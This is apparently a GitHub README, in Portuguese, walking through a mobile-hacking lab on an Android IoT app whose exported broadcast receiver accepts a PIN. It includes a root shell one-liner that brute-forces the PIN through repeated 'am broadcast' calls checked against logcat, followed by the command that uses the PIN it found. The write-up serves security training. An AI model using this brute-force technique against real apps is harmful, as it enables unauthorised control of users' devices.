Skip to content

admredhat/lab-iot-connect

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 

Repository files navigation

IOT Connect - Android Broadcast Receiver Challenge

Ao analisár o AndoidManifest.xml é possivel verificar que o Recever a baixo está setado como exported="true", referente à action MASTER_ON revela uma superfície de ataque potencial.

image

image

image

image

É necessario acesso de root para poder ter permissão no logcat

emulator64_x86_64_arm64:/ $ su

Podemos fazer um brute force no PIN e verificar se os dispositivos foram ligados com logcat.

emulator64_x86_64_arm64:/ # for i in $(seq 0 9999); do logcat -c && am broadcast -a MASTER_ON --ei key $i > /dev/null && sleep 0.3 && logcat -d | grep -q "Turning all devices on" && echo "[+] PIN FOUND: $i" && break; done

Depois de identificar o PIN é so utilizar enviando um broadcast para ligar os dispositivos.

emulator64_x86_64_arm64:/ # am broadcast -a MASTER_ON --ei key 345

image

image

image

image

image

am broadcast -a MASTER_ON --ei key 345

image

https://riptutorial.com/android/example/10642/sending-broadcast

https://www.mobilehackinglab.com/path-player?courseid=lab-iot-connect

About

iot

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages

  • Shell 100.0%